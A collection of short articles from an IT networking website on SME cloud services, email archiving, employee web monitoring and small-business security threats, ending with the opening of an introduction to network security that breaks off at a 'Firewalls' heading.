•  Build your business – The cost saving aspect is particularly important for those businesses that require a basic IT infrastructure but it still want to benefit from security and operational efficiency without spending any money. Hosted / managed services give companies the option to test and try technologies before deciding whether they need to move their IT in-house or leave it in the hands of third parties.

•  Pay-as-you-go or rental basis – Instead of investing heavily in IT hardware, software and personnel, a pay-per-use or subscription system makes more sense. Companies choosing this delivery model would do well, however, to read contractual agreements carefully. Many vendors/providers tie in customers for two or three years, which may be just right for a startup SME, but companies should look closely at any associated costs if they decide to stop the service and at whether migrating their data will prove a very costly affair. The key to choosing a hosted or managed service is to do one's homework and plan well. Not all companies will find a cloud-based service to be suitable even if the cost structure appears to be attractive.

Are There Any Drawbacks To This System?

Despite all the advantages mentioned above, some SMEs are still apprehensive when it comes to cloud-based solutions because they are concerned about their data's security. Although an important consideration, a quality cloud-based provider will have invested heavily in security and, more often than not, in systems that are beyond what a small business can afford to implement. A good provider will have invested in multiple backup locations, 24/7 monitoring, physical security to protect sites, and more.

On the other hand, the fact that the data would be exposed to third parties and not handled internally could be seen as a drawback by some companies, especially those handling sensitive data. As stated earlier, beware of the fine print and medium- to long-term costs before committing.

Another Option

If you're a server-hugger and need to have that all-important server close to your office, businesses can always combine their on-premise solution with a hosted or managed service – benefiting from the advantages and doing away with the inherent disadvantages.

Every company is different and whether you decide to go for a cloud-based solution or not, keep in mind that there is no right or wrong – it's all a matter of what your current business's infrastructure is like and your needs at the time. However, if you are a startup or a small business, cloud-based solutions are an attractive option worth taking into consideration.

 

  • Hits: 15768

61% of SMEs use Email Archiving in-house – What About the Others ?

A recent survey on email archiving, based on 202 US-based SMEs, found that a growing number of organizations are considering or would consider a third-party hosted email archiving service. A total of 18% of those organizations that already use an email archiving solution, have opted for a hosted service, while 38% said are open to using such a service.

At the same time, 51% of those surveyed said they would still only use an on-premise email archiving solution.

The findings paint an interesting picture of email archiving use among SMEs. Apart from the shocking statistic that more than 63% do not archive their email, those that do, or consider doing so, are interested in the various options available.

articles-email-archiving-1

On-premise or Hosted?

An increasing number of IT services are now offered as Software as a Service (SaaS) or hosted by a third party. Many services prove to be very cost effective when implemented at the scale which outsource service providers can manage, but there are still many admins – as the survey shows – who prefer to keep everything in house; security personnel who want to maintain data integrity internally, and business leaders who do not see the value of a cloud solution for their organization because their requirements dictate otherwise.

What is Email Archiving?

At its simplest, email archiving technology helps businesses maintain a copy of all emails sent or received from all users. This indispensible solution can be used for searches and to meet eDiscovery, compliance audits and reviews, to increase the overall long term storage capacity of the email system, and as a disaster recovery repository to ensure data availability.

Because email is so heavily tied to the internet, email archiving can readily be outsourced to service providers and can often be combined with other outsourced services like spam and malware filtering. Hosted email archiving eases the load on your IT staff, allowing them to focus on core activities, and can be a more economical solution than paying for additional servers, storage, and tape backups. It does of course require you to entrust your data to a third party, and often this is where companies may opt for an internal solution.

An internal email archiving solution, on the other hand, requires only minimal care and feeding, and offers the advantage of maintaining all data internally.

Email archiving solutions are essential for all businesses of any size, and organizations should consider the pros and cons of both hosted and on-premises email archiving, and deploy the solution which best suits their company's budget and needs.

  • Hits: 14321

Email Security - Can't Live Without It!

This white paper explains why antivirus software alone is not enough to protect your organization against the current and future onslaught of computer viruses. Examining the different kinds of email threats and email attack methods, this paper describes the need for a solid server-based content-checking gateway to safeguard your business against email viruses and attacks as well as information leaks.

We apologize but this paper is no longer available. Back to the Security Articles section.

  • Hits: 12151

Log-Based Intrusion-Detection and Analysis in Windows Servers

Introduction - How to Perform Network-Wide Security Event Log Management

Microsoft Windows machines have basic audit facilities but they fall short of fulfilling real-life business needs(i.e., monitoring Windows computers in real-time, periodically analyzing security activity, and maintaining along-term audit trail). Therefore, the need exists for a log-based intrusion detection and analysis tool such as EventsManager.

This paper explains how EventsManager’s innovative architecture can fill the gapsin Windows’ security log functionality – without hurting performance and while remaining cost-effective. Itdiscusses the use of EventsManager to implement best practice and fulfill due diligence requirementsimposed by auditors and regulatory agencies; and provides strategies for making maximum use of GFIEventsManager’s capabilities.

This white paper is no longer available by the vendor. To read similar interesting security articles, please visit our Security Articles section.

  • Hits: 14216

Web Monitoring for Employee Productivity Enhancement

All too often when web monitoring and Internet use restrictions are put into place it hurts company morale and does little to

enhance employee productivity. Not wanting to create friction in the workplace many employers shy away from using what could be a significant employee productivity enhancement tool. Wasting time through Internet activities is simple and it’s a huge hidden cost to business. Just answering a few personal e-mails, checking the sports scores, reading the news headlines and checking to see how your bid is holding up can easily waste an hour of time each day. If the company has an 8 person CAD department and each of them spends an hour day on the above activities, that’s a whole employee wasted!

Employees both want and don’t want to have their Internet use restricted. The key to success in gaining productivity and employee acceptance of the problem is the perception of fairness, clear goals and self enforcement.

Why Employees Don’t Want Internet Blocking

  1. They don’t know what is blocked and what is allowed. This uncertainty creates fear that they may do “something” that could hurt their advancement opportunities or worse jeopardize their job.
  2. Someone ruined it for everyone and that person still works here. When everyone is punished, no one is happy. Resentment builds against the employee known to have visited inappropriate websites.
  3. There’s no procedure in place for allowing an employee access to a blocked website. When an employee finds that a website they tried to access is blocked, what do they do? Certainly this indiscretion is going to show up on a report somewhere. What if they really need that site? Is there a procedure in place for allowing this person to access it?

Uncertainty is fodder for loss of morale. In today’s economic climate employees are especially sensitive to any action that can be perceived as clamping down on them. Therefore a web monitoring program must be developed that can be viewed in a positive light by all employees.

Why Employers are Afraid of Internet Blocking

  • The potential of adding to IT costs and human resources headaches takes the away the value from web monitoring. The Internet is a big place and employees are smart. Employers don’t want to get into a situation where they are simply chasing their tail, trading one productivity loss by incurred costs and frustration elsewhere.
  • Employers want to allow employee freedom. There is general recognition by employers that a happy employee is a loyal productive employee. Allowing certain freedoms creates a more satisfying work environment. The impact of taking that away may cause good employees to leave and an increase in turn over can be costly.

The fear of trading one cost for another or trading one headache for another has prevented many employers from implementing internet monitoring and blocking. A mistrust of IT services may also come into play.Technology got us into this situation, where up to 20% of employee time is spent on the Internet, many employers don’t trust that technology can also help them gain that productivity back. A monitoring program needs to be simple to implement and maintain.

Why Employees Want Internet Controls

  • Employees are very aware of what their co-workers are doing or not doing. If an employee in the office spends an hour every day monitoring their auctions on ebay, or reading personal e-mail or chatting onIM every other employee in the office knows it and resents it. If they are working hard, everyone elseshould be too.
  • Unfortunately pornographic and other offensive material finds its way into the office when the Internet is unrestricted. Exposure to this material puts the employee in a difficult situation. Do they tell the boss? Do they try to ignore it? Do they talk to the employee themselves? The employee would rather not be put into this situation.
  • Employees want to work for successful, growing companies. Solid corporate policies that are seen as a necessary means to continue to propel the company forward add to employee satisfaction. Web monitoring can be one of those policies.

How Employers can Gain Employee Support for Web Monitoring

  • Provide a clear, fair policy statement and expose the reasoning and goals. Keep it simple. Employees won’t read a long policy position paper. Stick to the facts and use positive language.
  • Policies that make sense to staff are easy to enforce
  • Policies with goals are easy to measure
  • When the goal has been reached celebrate with your employees in a big way. Everyone likes to feel like part of the team.
  • Empower your employees. White list, don’t black list. Let each employee actively participate in deciding which sites are allowed and which aren’t for them. Let the employee tell you what they need to be most productive and then provide it, no questions asked.
  • Most job positions can be boiled down to between 5 and 20 websites. Employees know what they need. Ask them to provide a list.
  • Show employees the web monitoring reports. Let them see the before and after and let them see the on-going reports. This will encourage self monitoring. This is an enforcement tool in disguise. Employees know that management can view these reports too and will take care that they make them look good.
  • Send employees a weekly report on their Internet usage. They will look at and will act upon to make sure they are portrayed to management in the best light and may even compare themselves against others.

Summary

Web monitoring is good for business. The Internet as a productivity tool has wide acceptance but recent changes have brought new distractions costing business some of those productivity gains. The Internet can be controlled but needs to be done in a way that allows for employee buy-in, self monitoring and self enforcement to be successful.

  • Hits: 13963

Security Threats: A Guide for Small & Medium Businesses

A successful business works on the basis of revenue growth and loss prevention. Small and medium-sized businesses are particularly hit hard when either one or both of these business requirements suffer. Data leakage, down-time and reputation loss can easily turn away new and existing customers if such situations are not handled appropriately and quickly. This may, in turn, impact on the company’s bottom line and ultimately profit margins. A computer virus outbreak or a network breach can cost a business thousands of dollars. In some cases, it may even lead to legal liability and lawsuits.

The truth is that many organizations would like to have a secure IT environment but very often this need comes into conflict with other priorities. Firms often find the task of keeping the business functions aligned with the security process highly challenging. When economic circumstances look dire, it is easy to turn security into a checklist item that keeps being pushed back. However the reality is that, in such situations, security should be a primary issue. The likelihood of threats affecting your business will probably increase and the impact can be more detrimental if it tarnishes your reputation.This paper aims to help small and medium-sized businesses focus on threats that are likely to have an impact on, and affect, the organization.

These threats specifically target small and medium-sized business rather than enterprise companies or home users.

Security Threats That Affect SMBs - Malicious Internet Content

Most modern small or medium-sized businesses need an Internet connection to operate. If you remove thismeans of communication, many areas of the organization will not be able to function properly or else they maybe forced to revert to old, inefficient systems. Just think how important email has become and that for manyorganizations this is the primary means of communication. Even phone communications are changing shapewith Voice over IP becoming a standard in many organizations.At some point, most organizations have been the victim of a computer virus attack.

While many may have antivirusprotection, it is not unusual for an organization of more than 10 employees to use email or the internetwithout any form of protection. Even large organizations are not spared. Recently, three hospitals in Londonhad to shut down their entire network due to an infection of a version of a worm called Mytob. Most of the timewe do not hear of small or medium-sized businesses becoming victims of such infections because it is not intheir interest to publicize these incidents. Many small or medium-sized business networks cannot afford toemploy prevention mechanisms such as network segregation.

These factors simply make it easier for a worm tospread throughout an organization.Malware is a term that includes computer viruses, worms, Trojans and any other kinds of malicious software.Employees and end users within an organization may unknowingly introduce malware on the network whenthey run malicious executable code (EXE files). Sometimes they might receive an email with an attached wormor download spyware when visiting a malicious website. Alternatively, to get work done, employees maydecide to install pirated software for which they do not have a license. This software tends to have more codethan advertised and is a common method used by malware writers to infect the end user’s computers. Anorganization that operates efficiently usually has established ways to share files and content across theorganization. These methods can also be abused by worms to further infect computer systems on the network.Computer malware does not have to be introduced manually or consciously.

Basic software packages installedon desktop computers such as Internet Explorer, Firefox, Adobe Acrobat Reader or Flash have their fair share ofsecurity vulnerabilities. These security weaknesses are actively exploited by malware writers to automaticallyinfect victim’s computers. Such attacks are known as drive-by downloads because the user does not haveknowledge of malicious files being downloaded onto his or her computer. In 2007 Google issued an alert 1describing 450,000 web pages that can install malware without the user’s consent.

Then You Get Social Engineering Attacks

This term refers to a set of techniques whereby attackers make themost of weaknesses in human nature rather than flaws within the technology. A phishing attack is a type ofsocial engineering attack that is normally opportunistic and targets a subset of society. A phishing emailmessage will typically look very familiar to the end users – it will make use of genuine logos and other visuals(from a well-known bank, for example) and will, for all intents and purposes, appear to be the genuine thing.When the end user follows the instructions in the email, he or she is directed to reveal sensitive or privateinformation such as passwords, pin codes and credit card numbers.

Employees and desktop computers are not the only target in an organization. Most small or medium-sizedcompanies need to make use of servers for email, customer relationship management and file sharing. Theseservers tend to hold critical information that can easily become a target of an attack. Additionally, the movetowards web applications has introduced a large number of new security vulnerabilities that are activelyexploited by attackers to gain access to these web applications. If these services are compromised there is ahigh risk that sensitive information can be leaked and used by cyber-criminals to commit fraud.

Attacks on Physical Systems

Internet-borne attacks are not the only security issue that organizations face. Laptops and mobiles areentrusted with the most sensitive of information about the organization. These devices, whether they arecompany property or personally owned, often contain company documents and are used to log on to thecompany network. More often than not, these mobile devices are also used during conferences and travel, thusrunning the risk of physical theft.

The number of laptops and mobile devices stolen per year is ever on theincrease. Attrition.org had over 400 articles in 20082 related to high profile data loss, many of which involvedstolen laptops and missing disks. If it happens to major hospitals and governments that have established ruleson handling such situations, why should it not happen to smaller businesses?

Another Threat Affecting Physical Security is that of Unprotected Endpoints

USB ports and DVD drives can bothbe used to leak data and introduce malware on the network. A USB stick that is mainly used for work and maycontain sensitive documents, becomes a security risk if it is taken home and left lying around and othermembers of the family use it on their home PC. While the employee may understand the sensitive nature of theinformation stored on the USB stick, the rest of the family will probably not.

They may copy files back and forthwithout considering the implications. This is typically a case of negligence but it can also be the work of atargeted attack, where internal employees can take large amounts of information out of the company.Small and medium-sized businesses may overlook the importance of securing the physical network and serverroom to prevent unauthorized persons from gaining access. Open network points and unprotected serverrooms can allow disgruntled employees and visitors to connect to the network and launch attacks such as ARP spoofing to capture network traffic with no encryption and steal passwords and content.

Authentication and Privilege Attacks

Passwords remain the number one vulnerability in many systems. It is not an easy task to have a secure systemwhereby people are required to choose a unique password that others cannot guess but is still easy for them toremember. Nowadays most people have at least five other passwords to remember, and the password used forcompany business should not be the same one used for webmail accounts, site memberships and so on. Highprofile intrusions such as the one on Twitter3 (the password was happiness), clearly show that passwords areoften the most common and universal security weakness and attacks exploiting this weakness do not require alot of technical knowledge.

Password policies can go a long way to mitigate the risk, but if the password policy is too strict people will findways and means to get around it. They will write the password on sticky notes, share them with their colleaguesor simply find a keyboard pattern (1q2w3e4r5t) that is easy to remember but also easy to guess.

Most complex password policies can be easily rendered useless by non-technological means.In small and medium-sized businesses, systems administrators are often found to be doing the work of thenetwork operators and project managers as well as security analysts. Therefore a disgruntled systemsadministrator will be a major security problem due to the amount of responsibility (and access rights) that he orshe holds. With full access privileges, a systems administrator may plan a logic bomb, backdoor accounts or leaksensitive company information that may greatly affect the stability and reputation of the organization.Additionally, in many cases the systems administrator is the person who sets the passwords for importantservices or servers. When he or she leaves the organization, these passwords may not be changed (especially ifnot documented) thus leaving a backdoor for the ex-employee.

A startup company called JournalSpace4 wascaught with no backups when their former system administrator decided to wipe out the main database. Thisproved to be disastrous for the company which ended up asking users to retrieve their content from Google’scache.The company’s management team may also have administrative privileges on their personal computers orlaptops. The reasons vary but they may want to be able to install new software or simply to have more controlof their machines. The problem with this scenario is that one compromised machine is all that an attacker needsto target an organization.

The firm itself does not need to be specifically picked out but may simply become avictim of an attack aimed at a particular vulnerable software package. Even when user accounts on the network are supposed to have reduced privileges, there may be times whereprivilege creep occurs. For example, a manager that hands over an old project to another manager may retainthe old privileges for years even after the handover!

When his or her account is compromised, the intruder alsogains access to the old project.Employees with mobile devices and laptop computers can pose a significant risk when they make use ofunsecured wireless networks whilst attending a conference or during their stay at a hotel. In many cases,inadequate or no encryption is used and anyone ‘in between’ can view and modify the network traffic. This canbe the start of an intrusion leading to compromised company accounts and networks.

Denial Of Service

In an attempt to minimize costs, or simply through negligence, most small and some medium-sized businesseshave various single points of failures. Denial of service is an attack that prevents legitimate users from makinguse of a service and it can be very hard to prevent. The means to carry out a DoS attack and the motives mayvary, but it typically leads to downtime and legitimate customers losing confidence in the organization - and itis not necessarily due to an Internet-borne incident.

In 2008 many organizations in the Mediterranean Sea basin and in the Middle East suffered Internet downtimedue to damages to the underwater Internet cables. Some of these organizations relied on a single Internetconnection, and their business was driven by Internet communications.

Having such a single point of failureproved to be very damaging for these organizations in terms of lost productivity and lost business. Reliability isa major concern for most businesses and their inability to address even one single point of failure can be costly.If an organization is not prepared for a security incident, it will probably not handle the situation appropriately.

One question that needs to be asked is: if a virus outbreak does occur, who should handle the various steps thatneed to be taken to get the systems back in shape? If an organization is simply relying on the systemsadministrator to handle such incidents, then that organization is not acknowledging that such a situation is notsimply technical in nature. It is important to be able to identify the entry point, to approach the personsconcerned and to have policies in place to prevent future occurrences - apart from simply removing the virusfrom the network! If all these tasks are left to a systems administrator, who might have to do everything ad hoc,then that is a formula for lengthy downtime.

Addressing Security Threats - An Anti-virus is not an Option

The volume of malware that can hit organizations today is enormous and the attack vectors are multiple.Viruses may spread through email, websites, USB sticks, and instant messenger programs to name but a few. Ifan organization does not have an anti-virus installed, the safety of the desktop computers will be at the mercyof the end user – and relying on the end user is not advisable or worth the risk.

Protecting desktop workstations is only one recommended practice. Once virus code is present on a desktopcomputer, it becomes a race between the virus and the anti-virus. Most malware has functionality to disableyour anti-virus software, firewalls and so on. Therefore you do not want the virus to get to your desktopcomputer in the first place!The solution is to deploy content filtering at the gateway.

Anti-virus can be part of the content filtering strategywhich can be installed at the email and web gateway. Email accounts are frequently spammed with maliciousemail attachments. These files often appear to come from legitimate contacts thus fooling the end user intorunning the malware code. Leaving the decision to the user whether or not to trust an attachment received byemail is never a good idea.

By blocking malware at the email gateway, you are greatly reducing the risk that endusers may make a mistake and open an infected file. Similarly, scanning all incoming web (HTTP) traffic formalicious code addresses a major infection vector and is a requirement when running a secure networkenvironment.

Security Awareness

A large percentage of successful attacks do not necessarily exploit technical vulnerabilities. Instead they rely onsocial engineering and people’s willingness to trust others. There are two extremes: either employees in anorganization totally mistrust each other to such an extent that the sharing of data or information is nil; or, at theother end of the scale, you have total trust between all employees.

In organizations neither approach isdesirable. There has to be an element of trust throughout an organization but checks and balances are just asimportant. Employees need to be given the opportunity to work and share data but they must also be aware ofthe security issues that arise as a result of their actions. This is why a security awareness program is soimportant.For example, malware often relies on victims to run an executable file to spread and infect a computer ornetwork.

Telling your employees not to open emails from unknown senders is not enough. They need to betold that in so doing they risk losing all their work, their passwords and other confidential details to thirdparties. They need to understand what behavior is acceptable when dealing with email and web content.Anything suspicious should be reported to someone who can handle security incidents. Having opencommunication across different departments makes for better information security, since many socialengineering attacks abuse the communication breakdowns across departments.

Additionally, it is important tokeep in mind that a positive working environment where people are happy in their job is less susceptible toinsider attacks than an oppressive workplace.

Endpoint Security

A lot of information in an organization is not centralized. Even when there is a central system, information isoften shared between different users, different devices and copied numerous times. In contrast with perimetersecurity, endpoint security is the concept that each device in an organization needs to be secured. It isrecommended that sensitive information is encrypted on portable devices such as laptops.

Additionally,removable storage such as DVD drives, floppy drives and USB ports may be blocked if they are considered to bea major threat vector for malware infections or data leakage.Securing endpoints on a network may require extensive planning and auditing. For example, policies can beapplied that state that only certain computers (e.g. laptops) can connect to specific networks. It may also makesense to restrict usage of wireless (WiFi) access points.

Policies

Policies are the basis of every information security program. It is useless taking security precautions or trying tomanage a secure environment if there are no objectives or clearly defined rules. Policies clarify what is or is notallowed in an organization as well as define the procedures that apply in different situations. They should beclear and have the full backing of senior management. Finally they need to be communicated to theorganization’s staff and enforced accordingly.

There are various policies, some of which can be enforced through technology and others which have to beenforced through human resources. For example, password complexity policies can be enforced throughWindows domain policies. On the other hand, a policy which ensures that company USB sticks are not takenhome may need to be enforced through awareness and labeling.

As with most security precautions, it isimportant that policies that affect security are driven by business objectives rather than gut feelings. If securitypolicies are too strict, they will be bypassed, thus creating a false sense of security and possibly create newattack vectors.

Role Separation

Separation of duties, auditing and the principle of least privilege can go a long way in protecting anorganization from having single points of failure and privilege creep. By employing separation of duties, theimpact of a particular employee turning against the organization is greatly reduced. For example, a systemadministrator who is not allowed to make alterations to the database server directly, but has to ask thedatabase administrator and document his actions, is a good use of separation of duties.

A security analyst whoreceives a report when a network operator makes changes to the firewall access control lists is a goodapplication of auditing. If a manager has no business need to install software on a regular basis, then his or heraccount should not be granted such privileges (power user on Windows). These concepts are very importantand it all boils down to who is watching the watchers.

Backup and Redundant Systems

Although less glamorous than other topics in Information Security, backups remain one of the most reliablesolutions. Making use of backups can have a direct business benefit when things go wrong. Disasters do occurand an organization will come across situations when hardware fails or a user (intentionally or otherwise)deletes important data.

A well-managed and tested backup system will get the business back up and runningin very little time compared to other disaster recovery solutions. It is therefore important that backups are notonly automated to avoid human error but also periodically tested. It is useless having a backup system ifrestoration does not function as advertised.Redundant systems allow a business to continue working even if a disaster occurs.

Backup servers andalternative network connections can help to reduce downtime or at least provide a business with limitedresources until all systems and data are restored.

Keeping your Systems Patched

New advisories addressing security vulnerabilities in software are published on a daily basis. It is not an easytask to stay up-to-date with all the vulnerabilities that apply for software installed on the network, thereforemany organizations make use of a patch management system to handle the task. It is important to note thatpatches and security updates are not only issued for Microsoft products but also for third party software. Forexample, although the web browser is running the latest updates, a desktop can still be compromised whenvisiting a website simply because it is running a vulnerable version of Adobe Flash.

Additionally it may beimportant to assess the impact of vulnerability before applying a patch, rather than applying patchesreligiously. It is also important to test security updates before applying them to a live system. The reason is that,from time to time, vendors issue patches that may conflict with other systems or that were not tested for yourparticular configuration.

Additionally, security updates may sometimes result in temporary downtime, forexposureSimple systems are easier to manage and therefore any security issues that apply to such systems can beaddressed with relative ease. However, complex systems and networks make it harder for a security analyst toassess their security status. For example, if an organization does not need to expose a large number of services on the Internet, the firewall configuration would be quite straightforward. However, the greater the company’sneed to be visible – an online retailer, for example – the more complex the firewall configuration will be, leavingroom for possible security holes that could be exploited by attackers to access internal network services.

When servers and desktop computers have fewer software packages installed, they are easier to keep up-todateand manage. This concept can work hand in hand with the principle of least privilege. By making use offewer components, fewer software and fewer privileges, you reduce the attack surface while allowing forsecurity to be more focused to tackle real issues.

Conclusion

Security in small and medium-sized businesses is more than just preventing viruses and blocking spam. In 2009,cybercrime is expected to increase as criminals attempt to exploit weaknesses in systems and in people. Thisdocument aims to give managers, analysts, administrators and operators in small and medium-sized businessesa snapshot of the IT security threats facing their organization. Every organization is different but in manyinstances the threats are common to all. Security is a cost of doing business but those that prepare themselveswell against possible threats will benefit the most in the long term.



  • Hits: 33338

Web Security Software Dealing With Malware

It is widely acknowledged that any responsible modern-day organization will strive to protect its network against malware attacks. Each day brings on a spawning of increasingly sophisticated viruses, worms, spyware, Trojans, and all other kinds of malicious software which can ultimately lead to an organization's network being compromised or brought down. Private information can be inadvertently leaked, a company's network can crash; whatever the outcome, poor security strategies could equal disaster. Having a network that is connected to the Internet leaves you vulnerable to attack, but Internet access is an absolute necessity for most organizations, so the wise thing to do would be to have a decent web security package installed on your machines, preferably at the gateway.

There are several antivirus engines on the market and each product has its own heuristics, and subsequently its own particular strengths and weaknesses. It's impossible to claim any one as the best overall at any given time. It can never be predicted which antivirus lab will be the quickest to release an update providing protection against the next virus outbreak; it is often one company on one occasion and another one the next.

Web security can never be one hundred percent guaranteed at all times, but, there are ways to significantly minimize the risks. It is good and usual practice to use an antivirus engine to help protect your network, but it would naturally be much better to use several of them at once. Why is this? If, hypothetically speaking, your organization uses product A, and a new virus breaks out, it might be Lab A or Lab B, or any other antivirus lab, which releases an update the fastest. So the logical conclusion would be that, the more AV engines you make use of, the greater the likelihood of you nipping that attack in the bud.

This is one of the ways in which web security software can give you better peace of mind. Files which are downloaded on any of your company's computers can each be scanned using several engines, rather than just one, which could significantly reduce the time it will take to obtain the latest virus signatures, therefore diminishing the risk to your site by each new attack.

Another plus side of web security software is that multiple download control policies can be set according to the individual organization's security policies, which could be either user, group or IP-based, controlling the downloading of different file types such as JavaScript, MP3, MPEG, exe, and more by specific users/groups/IP addresses. Hazardous files like Trojan downloader programs very often appear disguised as harmless files in order to gain access to a system. A good web security solution will analyze and detect the real file types HTTP/FTP file downloads, making sure that files which are downloaded contain no viruses or malware.

The long and short of it is this: you want the best security possible for your network, but it's not within anyone's power to predict where the next patch will come from. Rather than playing Russian roulette by sticking to one AV engine, adopt a web security package that will enable you to use several of them.

  • Hits: 13683

The Web Security Strategy for Your Organization

In today's business world, internet usage has become a necessity for doing business. Unfortunately, a company's use of the internet comes with considerable risk to its network and business information.

Web security threats include phishing attacks, malware, scareware, rootkits, keyloggers, viruses and spam. While many attacks occur when information is downloaded from a website, others are now possible through drive-by attacks where simply visiting a website can infect a computer. These attacks usually result in data and information leakage, loss in productivity, loss of network bandwidth and, depending on the circumstances, even liability issues for the company. In addition to all this, cleanup from malware and other types of attacks on a company's network are usually costly from both the dollar aspect as well as the time spent recovering from these web security threats.

Fortunately, there are steps a company can take to protect itself from these web security threats. Some are more effective than others, but the following suggestions should help narrow down the choices.

Employee Internet Usage Policy

The first and probably the least expensive solution would be to develop and implement an employee internet usage policy. This policy should clearly define what an employee can and cannot do when using the internet. It should also address personal usage of the internet on the business computer. The policy should identify the type of websites that can be accessed by the employee for business purposes and what, if any, type of material can be downloaded from the internet. Always make sure the information contained in the policy fits your unique business needs and environment.

Employee Education

Train your employees to recognize web security threats and how to lower the risk of infection. In today's business environment, laptops, smartphones, iPads, and other similar devices are not only used for business purposes, but also for personal and home use. When devices are used at home, the risk of an infection on that device is high and malware could easily be transferred to the business network. This is why employee education is so important.

Patch Management

Good patch management practices should also be in place and implemented using a clearly-defined patch management policy. Operating systems and applications, including browsers, should be updated regularly with the latest available security patches. The browser, whether a mobile version used on a smartphone or a full version used on a computer, is a primary vector for malware attacks and merits particular attention. Using the latest version of a browser is a must as known vulnerabilities would have been addressed

Internet Monitoring Software

Lastly, I would mention the use of internet monitoring software. Internet monitoring software should be able to protect the network against malware, scareware, viruses, phishing attacks and other malicious software. A robust internet monitoring software solution will help to enforce your company's internet usage policy by blocking connections to unacceptable websites, by monitoring downloads, and by monitoring encrypted web traffic going into and out of the network.

There is no single method that can guarantee 100% web security protection, however a well thought-out strategy is one huge step towards minimizing risk that the network could be targeted by the bad guys.

 



  • Hits: 18348

Introduction To Network Security - Part 1

As more and more people and businesses have begun to use computer networks and the Internet, the need for a secure computing environment has never been greater. Right now, information security professionals are in great demand and the importance of the field is growing every day. All the industry leaders have been placing their bets on security in the last few years.

All IT venodors agree today that secure computing is no longer an optional component, it is something that should be integrated into every system rather than being thrown in as an afterthought. Usually programmers would concentrate on getting a program working, and then (if there was time) try and weed out possible security holes.

Now, applications must be coded from the ground up with security in mind, as these applications will be used by people who expect the security and privacy of their data to be maintained.

This article intends to serve as a very brief introduction to information security with an emphasis on networking.

The reasons for this are twofold:

Firstly, in case you did not notice.. this is a networking website,

Secondly, the time a system is most vulnerable is when it is connected to the Internet.

For an understanding of what lies in the following pages, you should have decent knowledge of how the Internet works. You don't need to know the ins and outs of every protocol under the sun, but a basic understanding of network (and obviously computer) fundamentals is essential.

If you're a complete newbie however, do not despair. We would recommend you look under the Networking menu at the top of the site...where you will find our accolade winning material on pretty much everything in networking.

Hacker or Cracker?

There is a very well worn out arguement against using the incorrect use of the word 'hacker' to denote a computer criminal -- the correct term is a 'cracker' or when referring to people who have automated tools and very little real knowledge, 'script kiddie'. Hackers are actually just very adept programmers (the term came from 'hacking the code' where a programmer would quickly program fixes to problems he faced).

While many feel that this distinction has been lost due to the media portraying hackers as computer criminals, we will stick to the original definitions through these articles more than anything to avoid the inevitable flame mail we will get if we don't !

On to the Cool Stuff!

This introduction is broadly broken down into the following parts :

• The Threat to Home Users
• The Threat to the Enterprise
• Common Security Measures Explained
• Intrusion Detection Systems
• Tools an Attacker Uses
• What is Penetration-Testing?
• A Brief Walk-through of an Attack
• Where Can I Find More Information?
• Conclusion

The Threat to Home Users

Many people underestimate the threat they face when they use the Internet. The prevalent mindset is "who would bother to attack me or my computer?", while this is true -- it may be unlikely that an attacker would individually target you, as to him, you are just one more system on the Internet.

Many script kiddies simply unleash an automated tool that will scan large ranges of IP addresses looking for vulnerable systems, when it finds one, this tool will automatically exploit the vulnerability and take control of this machine.

The script kiddie can later use this vast collection of 'owned' systems to launch a denial of service (DoS) attacks, or just cover his tracks by hopping from one system to another in order to hide his real IP address.

This technique of proxying attacks through many systems is quite common, as it makes it very difficult for law enforcement to back trace the route of the attack, especially if the attacker relays it through systems in different geographic locations.

It is very feasible -- in fact quite likely -- that your machine will be in the target range of such a scan, and if you haven't taken adequate precautions, it will be owned.

The other threat comes from computer worms that have recently been the subject of a lot of media attention. Essentially a worm is just an exploit with a propagation mechanism. It works in a manner similar to how the script kiddie's automated tool works -- it scans ranges of IP addresses, infects vulnerable machines, and then uses those to scan further.

Thus the rate of infection increases geometrically as each infected system starts looking for new victims. In theory a worm could be written with such a refined scanning algorithm, that it could infect 100% of all vulnerable machines within ten minutes. This leaves hardly any time for response.

Another threat comes in the form of viruses, most often these may be propagated by email and use some crude form of social engineering (such as using the subject line "I love you" or "Re: The documents you asked for") to trick people into opening them. No form of network level protection can guard against these attacks.

The effects of the virus may be mundane (simply spreading to people in your address book) to devastating (deleting critical system files). A couple of years ago there was an email virus that emailed confidential documents from the popular Windows "My Documents" folder to everyone in the victims address book.

So while you per se may not be high profile enough to warrant a systematic attack, you are what I like to call a bystander victim.. someone who got attacked simply because you could be attacked, and you were there to be attacked.

As broadband and always-on Internet connections become commonplace, even hackers are targetting the IP ranges where they know they will find cable modem customers. They do this because they know they will find unprotected always-on systems here that can be used as a base for launching other attacks.

The Threat to the Enterprise

Most businesses have conceded that having an Internet presence is critical to keep up with the competition, and most of them have realised the need to secure that online presence.

Gone are the days when firewalls were an option and employees were given unrestricted Internet access. These days most medium sized corporations implement firewalls, content monitoring and intrusion detection systems as part of the basic network infrastructure.

For the enterprise, security is very important -- the threats include:

• Corporate espionage by competitors,
• Attacks from disgruntled ex-employees
• Attacks from outsiders who are looking to obtain private data and steal the company's crown jewels (be it a database of credit cards, information on a new product, financial data, source code to programs, etc.)
• Attacks from outsiders who just want to use your company's resources to store pornography, illegal pirated software, movies and music, so that others can download and your company ends up paying the bandwidth bill and in some countries can be held liable for the copyright violations on movies and music.

As far as securing the enterprise goes, it is not enough to merely install a firewall or intrustion detection system and assume that you are covered against all threats. The company must have a complete security policy and basic training must be imparted to all employees telling them things they should and should not do, as well as who to contact in the event of an incident. Larger companies may even have an incident response or security team to deal specifically with these issues.

One has to understand that security in the enterprise is a 24/7 problem. There is a famous saying, "A chain is only as strong as its weakest link", the same rule applies to security.

After the security measures are put in place, someone has to take the trouble to read the logs, occasionally test the security, follow mailing-lists of the latest vulnerabilities to make sure software and hardware is up-to-date etc. In other words, if your organisation is serious about security, there should be someone who handles security issues.

This person is often a network administrator, but invariably in the chaotic throes of day-to-day administration (yes we all dread user support calls ! :) the security of the organisation gets compromised -- for example, an admin who needs to deliver 10 machines to a new department may not password protect the administrator account, just because it saves him some time and lets him meet a deadline. In short, an organisation is either serious about security issues or does not bother with them at all.

While the notion of 24/7 security may seem paranoid to some people, one has to understand that in a lot of cases a company is not specifically targetted by an attacker. The company's network just happen to be one that the attacker knows how to break into and thus they get targetted. This is often the case in attacks where company ftp or webservers have been used to host illegal material.

The attackers don't care what the company does - they just know that this is a system accessible from the Internet where they can store large amounts of warez (pirated software), music, movies, or pornography. This is actually a much larger problem than most people are aware of because in many cases, the attackers are very good at hiding the illegal data. Its only when the bandwidth bill has to be paid that someone realises that something is amiss.

Firewalls

